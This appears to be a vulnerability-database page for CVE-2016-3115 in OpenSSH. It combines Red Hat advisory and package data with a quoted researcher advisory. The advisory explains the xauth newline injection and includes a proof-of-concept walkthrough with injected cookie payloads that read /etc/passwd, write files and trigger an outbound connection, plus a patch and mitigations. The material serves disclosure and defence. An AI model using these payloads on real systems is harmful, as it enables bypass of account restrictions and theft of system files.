oval oval:com.redhat.rhsa:tst:20120884004

AND

comment openssh-clients is earlier than 0:6.6.1p1-25.el7_2
oval oval:com.redhat.rhsa:tst:20160465015
comment openssh-clients is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884002

rhsa

id	RHSA-2016:0465
released	2016-03-21
severity	Moderate
title	RHSA-2016:0465: openssh security update (Moderate)

bugzilla

id	1316829
title	CVE-2016-3115 openssh: missing sanitisation of input for X11 forwarding

oval

comment Red Hat Enterprise Linux must be installed
oval oval:com.redhat.rhba:tst:20070304026

AND

comment Red Hat Enterprise Linux 6 is installed
oval oval:com.redhat.rhba:tst:20111656003

AND
comment openssh-ldap is earlier than 0:5.3p1-114.el6_7
oval oval:com.redhat.rhsa:tst:20160466001
comment openssh-ldap is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884010

AND

comment pam_ssh_agent_auth is earlier than 0:0.9.3-114.el6_7
oval oval:com.redhat.rhsa:tst:20160466003
comment pam_ssh_agent_auth is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884012

AND

comment openssh-askpass is earlier than 0:5.3p1-114.el6_7
oval oval:com.redhat.rhsa:tst:20160466005
comment openssh-askpass is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884008

AND

comment openssh-clients is earlier than 0:5.3p1-114.el6_7
oval oval:com.redhat.rhsa:tst:20160466007
comment openssh-clients is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884002

AND

comment openssh-server is earlier than 0:5.3p1-114.el6_7
oval oval:com.redhat.rhsa:tst:20160466009
comment openssh-server is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884006

AND
comment openssh is earlier than 0:5.3p1-114.el6_7
oval oval:com.redhat.rhsa:tst:20160466011
comment openssh is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884004

rhsa

id	RHSA-2016:0466
released	2016-03-21
severity	Moderate
title	RHSA-2016:0466: openssh security update (Moderate)

rpms

openssh-0:6.6.1p1-25.el7_2
openssh-askpass-0:6.6.1p1-25.el7_2
openssh-clients-0:6.6.1p1-25.el7_2
openssh-debuginfo-0:6.6.1p1-25.el7_2
openssh-keycat-0:6.6.1p1-25.el7_2
openssh-ldap-0:6.6.1p1-25.el7_2
openssh-server-0:6.6.1p1-25.el7_2
openssh-server-sysvinit-0:6.6.1p1-25.el7_2
pam_ssh_agent_auth-0:0.9.3-9.25.el7_2
openssh-0:5.3p1-114.el6_7
openssh-askpass-0:5.3p1-114.el6_7
openssh-clients-0:5.3p1-114.el6_7
openssh-debuginfo-0:5.3p1-114.el6_7
openssh-ldap-0:5.3p1-114.el6_7
openssh-server-0:5.3p1-114.el6_7
pam_ssh_agent_auth-0:0.9.3-114.el6_7

Seebug

bulletinFamily	exploit
description	来源链接： https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 ### VuNote Author: <github.com/tintinweb> Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 Version: 0.2 Date: Mar 3rd, 2016 Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass ### Overview Name: openssh Vendor: OpenBSD References: * http://www.openssh.com/[1] Version: 7.2p1 [2] Latest Version: 7.2p1 Other Versions: <= 7.2p1 (all versions; dating back ~20 years) Platform(s): linux Technology: c Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection') Origin: remote Min. Privs.: post auth CVE: CVE-2016-3115 ### Description quote website [1] >OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options. ### Summary An authenticated user may inject arbitrary xauth commands by sending an x11 channel request that includes a newline character in the x11 cookie. The newline acts as a command separator to the xauth binary. This attack requires the server to have `X11Forwarding yes` enabled. Disabling it, mitigates this vector. By injecting xauth commands one gains limited* read/write arbitrary files, information leakage or xauth-connect capabilities. These capabilities can be leveraged by an authenticated restricted user - e.g. one with the login shell configured as /bin/false or one with configured forced-commands - to bypass account restriction. This is generally not expected. The injected xauth commands are performed with the effective permissions of the logged in user as the sshd already dropped its privileges. Quick-Info: * requires: X11Forwarding yes * bypasses /bin/false and forced-commands * OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear) * does not bypass /bin/nologin (as there is special treatment for this) Capabilities (xauth): * Xauth * write file: limited chars, xauthdb format * read file: limit lines cut at first \s * infoleak: environment * connect to other devices (may allow port probing) see attached PoC, Patch ### Details // see annotated code below * server_input_channel_req (serverloop.c) - session_input_channel_req:2299 (session.c [2]) - session_x11_req:2181 * do_exec_pty or do_exec_no_pty - do_child - do_rc_files (session.c:1335 [2]) Upon receiving an `x11-req` type channel request sshd parses the channel request parameters `auth_proto` and `auth_data` from the client ssh packet where `auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) and `auth_data` contains the actual x11 auth cookie. This information is stored in a session specific datastore. When calling `execute` on that session, sshd will call `do_rc_files` which tries to figure out if this is an x11 call by evaluating if `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND there is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc` is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`. Note that `auth_data` nor `auth_proto` was sanitized or validated, it just contains user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a command-separator to the `xauth` binary, this allows a client to inject arbitrary `xauth` commands. Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted input as arguments to that script. Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3] This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth command injection: SYNOPSIS xauth [ -f authfile ] [ -vqibn ] [ command arg ... ] add displayname protocolname hexkey generate displayname protocolname [trusted\|untrusted] [timeout seconds] [group group-id] [data hexdata] [n]extract filename displayname... [n]list [displayname...] [n]merge [filename...] remove displayname... source filename info exit quit version help ? Interesting commands are: info - leaks environment information / path ~# xauth info xauth: file /root/.Xauthority does not exist Authority file: /root/.Xauthority File new: yes File locked: no Number of entries: 0 Changes honored: yes Changes made: no Current input: (argv):1 source - arbitrary file read (cut on first `\s`) # xauth source /etc/shadow xauth: file /root/.Xauthority does not exist xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::" extract - arbitrary file write * limited characters * in xauth.db format * since it is not compressed it can be combined with `xauth add` to first store data in the database and then export it to an arbitrary location e.g. to plant a shell or do other things. generate - connect to <ip>:<port> (port probing, connect back and pot. exploit vulnerabilities in X.org ### Source Inline annotations are prefixed with `//#!` ```c /* * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found * first in this order). / static void do_rc_files(Session s, const char shell) { ... snprintf(cmd, sizeof cmd, "%s -q -", options.xauth_location); f = popen(cmd, "w"); //#! run xauth -q - if (f) { fprintf(f, "remove %s\n", //#! remove <user_tainted_data> - injecting \n auth_display injects xauth command s->auth_display); fprintf(f, "add %s %s %s\n", //#! \n injection s->auth_display, s->auth_proto, s->auth_data); pclose(f); } else { fprintf(stderr, "Could not run %s\n", cmd); } } } ``` ### Proof of Concept Prerequisites: install python 2.7.x * issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x * run `poc.py` Usage: <host> <port> <username> <password or path_to_privkey> path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key poc: 1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`: ```c #PUBKEY line - force commands: only allow "whoami" #cat /home/user1/.ssh/authorized_keys command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box #cat /etc/passwd user2:x:1001:1002:,,,:/home/user2:/bin/false ``` 2. run sshd with `X11Forwarding yes` (kali default config) ```c #> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d ``` 3. `forced-commands` - connect with user1 and display env information ```c #> python <host> 22 user1 .demoprivkey INFO:__main__:add this line to your authorized_keys file: #PUBKEY line - force commands: only allow "whoami" #cat /home/user/.ssh/authorized_keys command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box INFO:__main__:connecting to: user1:<PKEY>@host:22 INFO:__main__:connected! INFO:__main__: Available commands: .info .readfile <path> .writefile <path> <data> .exit .quit <any xauth command or type help> #> .info DEBUG:__main__:auth_cookie: '\ninfo' DEBUG:__main__:dummy exec returned: None INFO:__main__:Authority file: /home/user1/.Xauthority File new: no File locked: no Number of entries: 1 Changes honored: yes Changes made: no Current input: (stdin):3 /usr/bin/xauth: (stdin):2: bad "add" command line ... ``` 4. `forced-commands` - read `/etc/passwd` ```c ... #> .readfile /etc/passwd DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' DEBUG:__main__:dummy exec returned: None INFO:__main__:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync ... ``` 5. `forced-commands` - write `/tmp/testfile` ```c #> .writefile /tmp/testfile `thisisatestfile` DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa' DEBUG:__main__:dummy exec returned: None DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500' DEBUG:__main__:dummy exec returned: None DEBUG:__main__:/usr/bin/xauth: (stdin):2: bad "add" command line #> ls -lsat /tmp/testfile 4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile #> cat /tmp/testfile ú65500hiú65500`thisisatestfile`ª ``` 6. `/bin/false` - connect and read `/etc/passwd` ```c #> python <host> 22 user2 user2password INFO:__main__:connecting to: user2:user2password@host:22 INFO:__main__:connected! INFO:__main__: Available commands: .info .readfile <path> .writefile <path> <data> .exit .quit <any xauth command or type help> #> .readfile /etc/passwd DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' DEBUG:__main__:dummy exec returned: None INFO:__main__:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin ... user2:x:1001:1002:,,,:/home/user2:/bin/false ... ``` 7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100 ```c #> generate 8.8.8.8:100 . #> tcpdump IP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0 ``` ### Troubleshooting Q: `ImportError: No module named py3compat` A: outdated `paramiko` please upgrade with `pip install --upgrade paramiko` ### Proposed Patch * Sanitize user-tainted input `s->auth_data`, `s->auth_proto`, `s->display` by replacing all non-printables by spaces. (I know this is kind of ugly ;)) ```c #> ~/openssh-7.2p1# diff -u session.c session.c.patched --- session.c 2016-02-17 11:32:11.616868923 -0500 +++ session.c.patched 2016-02-17 11:33:33.681596273 -0500 @@ -1327,6 +1327,18 @@ return env; } +char * +sanitize_non_printable(char s) { + char ptr = s; + while (ptr != '\0'){ + if ((ptr < 0x20)\|\|(s >= 0x7f )){ / sanitizing \n would basically be enough / + ptr = ' '; + } + ptr++; + } + return s; +} + /* * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found * first in this order). @@ -1341,6 +1353,9 @@ do_xauth = s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL; + sanitize_non_printable(s->display); + sanitize_non_printable(s->auth_proto); + sanitize_non_printable(s->auth_data); /* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands / if (!s->is_subsystem && options.adm_forced_command == NULL && !no_user_rc && options.permit_user_rc && ``` ### Mitigation / Workaround disable x11-forwarding: `sshd_config` set `X11Forwarding no` * disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys` Notes ----- Verified, resolved and released within a few days. very impressive. Vendor response: see advisory [5] ### References [1] http://www.openssh.com/ [2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388 [3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376 [4] http://linux.die.net/man/1/xauth [5] http://www.openssh.com/txt/x11fwd.adv ### Contact https://github.com/tintinweb
id	SSV:91041
last seen	2017-11-19
modified	2016-03-16
published	2016-03-16
reporter	Root
source	https://www.seebug.org/vuldb/ssvid-91041
title	OpenSSH <=7.2p1 xauth injection

Vulnerabilities > CVE-2016-3115 {"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Vulnerabilities","item":"https://cyber.vumetric.com/vulns/"},{"@type":"ListItem","position":2,"name":"CVE-2016-3115"}]}

Summary

Vulnerable Configurations

Exploit-Db

Nessus

Packetstorm

Redhat

Seebug

References

Vulnerabilities > CVE-2016-3115